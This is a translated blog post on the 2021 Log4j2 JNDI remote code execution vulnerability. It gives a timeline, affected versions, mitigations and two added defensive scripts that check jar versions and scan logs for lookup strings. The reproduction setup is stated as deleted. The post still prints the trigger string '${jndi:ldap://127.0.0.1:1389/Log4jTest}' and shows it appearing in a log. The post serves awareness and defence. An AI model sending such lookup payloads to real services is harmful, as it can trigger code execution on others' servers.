Like, follow and share for unlimited power. Search WeChat for “Program Ape Alang”.
This article is collected at Github.com/niumoo/Java… and on the Unread Code site, which gather many knowledge points and article series.
In the early hours of December 10, 2021, a nuclear-bomb-level vulnerability in log4j was exposed on the Internet. The vulnerability is extremely high risk: it is easy to trigger, easy to exploit and applies to a huge range of applications, and it directly executes arbitrary code and takes over your server.
Here I wonder why the discloser published in the early morning, or chose to; perhaps the thought of countless engineers getting up in the middle of the night for an emergency fix gave them some abnormal pleasure.
I know what you want to see: how to reproduce it. But let's look at how to fix it first, purely to raise security awareness.
0x01. Vulnerability situation
Apache Log4j2 is an excellent Java logging framework. Because Log4j2 performs lookup substitution (including JNDI lookups) on the content it logs, an attacker can craft a malicious request whose content gets logged and thereby trigger remote code execution. No special configuration is required to exploit the vulnerability.
Here is the vulnerability disclosure status.
Vulnerability details | Vulnerability PoC | Vulnerability EXP | In-the-wild exploitation |
---|---|---|---|
Public | Public | Public | Yes |
From the information published online, the details of this vulnerability have been fully disclosed. Here is a simple demonstration so that everyone understands the vulnerability and applies the security upgrade as soon as possible.
According to public reports, the following timeline can be pieced together:
- On November 24, 2021, the Alibaba Cloud security team reported the Apache Log4j2 remote code execution vulnerability to Apache.
- On December 06, 2021, log4j2 released the fix package log4j-2.15.0-rc1.jar.
- On December 10, 2021, log4j2 released the fix package log4j-2.15.0-rc2.jar.
- On December 10, 2021, the Alibaba Cloud security team found that Apache Log4j 2.15.0-rc1 can be bypassed; please update to Apache Log4j 2.15.0-rc2 in time.
The actually affected versions are:
Apache Log4j 2.x < 2.15.0-rc2
0x02. Security Suggestions
- Check whether the application imports the Apache log4j-core jar. If the dependency is present and its version is in the affected range, the application may be vulnerable. Please update Apache Log4j2 to the latest log4j-2.15.0-rc2 at github.com/apache/logg…
- Upgrade known affected applications and components, such as spring-boot-starter-log4j2, Apache Struts2, Apache Solr, Apache Druid and Apache Flink.
- Temporary mitigations. Upgrading the JDK to 6u211/7u201/8u191/11.0.1 or later limits JNDI and other exploitation methods to a certain extent. For Log4j versions 2.10 and above, set `log4j2.formatMsgNoLookups` to `true`, or remove the JndiLookup class from the classpath, for example: `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`.
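To make the first and third suggestions checkable, here is an inventory script added for this article (it is not code from the original post or from the Log4j project). It walks a directory tree, finds `log4j-core-*.jar` files, reads the version from the file name, compares it with the affected range stated above (2.x below 2.15.0-rc2) and reports whether the JndiLookup class is still inside the jar, i.e. whether the "remove the class" mitigation has been applied. The version-tuple ordering, the report format and the sample directory layout are assumptions of this example.

```python
"""Inventory check for log4j-core jars (added example, not from the post).

Finds log4j-core-*.jar under a directory, flags versions inside the affected
range the post gives (2.x < 2.15.0-rc2) and reports whether the JndiLookup
class has been stripped from the jar.
"""
import os
import re
import zipfile

# Class path named in the mitigation above.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Jar name pattern assumed by this example: log4j-core-<major>.<minor>.<patch>[-rcN].jar
JAR_NAME_RE = re.compile(
    r"^log4j-core-(\d+)\.(\d+)\.(\d+)(?:-rc(\d+))?\.jar$", re.IGNORECASE
)
# 2.15.0-rc2 is the fixed version named in the post.
FIXED_VERSION = (2, 15, 0, 2)


def parse_version(jar_name):
    """Return (major, minor, patch, rc) for a log4j-core jar name, or None.

    A final release sorts after its release candidates, so a missing rc
    number is stored as a very large value (assumption of this example).
    """
    m = JAR_NAME_RE.match(jar_name)
    if not m:
        return None
    major, minor, patch, rc = m.groups()
    return (int(major), int(minor), int(patch), int(rc) if rc else 10**6)


def is_affected_version(version):
    """True for 2.x versions below 2.15.0-rc2, the range given in the post."""
    return version[0] == 2 and version < FIXED_VERSION


def jar_has_jndi_lookup(jar_path):
    """True if the JndiLookup class is still present inside the jar."""
    with zipfile.ZipFile(jar_path) as jar:
        return JNDI_LOOKUP_CLASS in jar.namelist()


def scan(root):
    """Return one finding dict per log4j-core jar found under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            version = parse_version(name)
            if version is None:
                continue  # not a log4j-core jar (log4j-api etc. are skipped)
            path = os.path.join(dirpath, name)
            try:
                present = jar_has_jndi_lookup(path)
            except zipfile.BadZipFile:
                present = None  # unreadable jar: still reported, treated as unknown
            findings.append({
                "path": path,
                "version": version,
                "affected": is_affected_version(version),
                "jndi_lookup_present": present,
            })
    return findings


def needs_action(finding):
    """Affected version whose JndiLookup class has not (verifiably) been removed."""
    return finding["affected"] and finding["jndi_lookup_present"] is not False


if __name__ == "__main__":
    import sys

    for f in scan(sys.argv[1] if len(sys.argv) > 1 else "."):
        status = "ACTION NEEDED" if needs_action(f) else "ok"
        print(f"{status}: {f['path']} version={f['version']} "
              f"jndi_lookup_present={f['jndi_lookup_present']}")
```

Run it with the application's lib directory as the argument; a jar is reported as "ok" only when its version is outside the affected range or the JndiLookup class is confirmed absent. Note that it only inspects jars named `log4j-core-*.jar`, so shaded or renamed copies of log4j-core inside fat jars are not covered by this check.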
0x03. Vulnerability reproduction
The following tests are for study and analysis only, not for any other purpose! Standalone demo; all addresses are 127.0.0.1.
I hadn't planned to draw anything, but many readers think exploiting this injection vulnerability is simply sending `${jndi:ldap://127.0.0.1:1389/Log4jTest}` over the network, so I think a simple diagram of the attack chain, step by step, is necessary. Forgive the rushed drawing.
3.1. Environment simulation – Victim service setup
Deleted here. It didn't feel right after it was posted, and it might be used by people with other intentions. If you want to know, search WeChat for “Program Ape Alang” and get in touch directly.
3.2. Environment simulation – Attacker simulation
Deleted here. It didn't feel right after it was posted, and it might be used by people with other intentions. If you want to know, search WeChat for “Program Ape Alang” and get in touch directly.
3.3. Test
The victim service is run again and logs a single simple line, except that now the line carries an instruction.
Harmless test, nothing offensive: on Linux/macOS it creates the text file xxxYYYzzz.txt; on Windows it pops up the calculator. And finally, a plug: please follow the public account “Program Ape Alang”.
```
20:21:57.780 [main] ERROR Log4j2 - params: ${jndi:ldap://127.0.0.1:1389/Log4jTest}
```
After it runs, the project directory also contains the file xxxYYYzzz.txt.
If you run the test on Windows, a calculator pops up.
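The log line above is also what a defender sees on the victim side: the lookup expression lands in the application log verbatim. The following scanner, added for this article (not code from the original post), flags log lines that contain a `${jndi:...}` lookup and reports any other `${prefix:...}` lookup expression for review, so an attempted trigger can be spotted in application or access logs. The sample log lines are constructed for the example; the first one repeats the line logged above.

```python
"""Detect Log4j lookup expressions in log lines (added example, not from the post)."""
import re

# A lookup expression is ${prefix:argument}. The jndi: prefix is the one the
# post demonstrates; every other prefix is reported for review as well.
LOOKUP_RE = re.compile(r"\$\{\s*([a-zA-Z]+)\s*:([^}]*)\}")

# Constructed sample input: the line from the test above plus two benign lines.
SAMPLE_LOG_LINES = [
    "20:21:57.780 [main] ERROR Log4j2 - params: ${jndi:ldap://127.0.0.1:1389/Log4jTest}",
    "20:21:58.001 [main] INFO  Log4j2 - params: hello world",
    "20:21:59.120 [main] INFO  Log4j2 - user agent: ${java:version}",
]


def find_lookups(line):
    """Return [(prefix, argument), ...] for every ${prefix:argument} in the line."""
    return [(m.group(1).lower(), m.group(2).strip()) for m in LOOKUP_RE.finditer(line)]


def classify(line):
    """'jndi' if a JNDI lookup is present, 'lookup' for any other lookup, else None."""
    lookups = find_lookups(line)
    if any(prefix == "jndi" for prefix, _ in lookups):
        return "jndi"
    return "lookup" if lookups else None


def scan_lines(lines):
    """Return [(line_number, classification, line)] for lines carrying a lookup."""
    hits = []
    for n, line in enumerate(lines, start=1):
        c = classify(line)
        if c:
            hits.append((n, c, line))
    return hits


if __name__ == "__main__":
    for n, c, line in scan_lines(SAMPLE_LOG_LINES):
        print(f"line {n}: {c.upper()} -> {line}")
```

Feed it the application's log files (one line per call to `classify`, or a whole file via `scan_lines`) and alert on every `jndi` hit; the `lookup` hits are lower priority but worth a look, since the scanner only recognises the plain `${prefix:...}` form and any lookup reaching the logs from user input is suspicious.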
As always, the code for this article is at: github.com/niumoo/lab-…
Afterword
Hello world :) I'm Aaron, a tech tool guy on the front line.
This article is continuously updated; you can follow the public account “Program Ape Alang” or visit the Unread Code blog (https://www.wdbyte.com).
This article is collected at Github.com/niumoo/Java… Welcome to Star!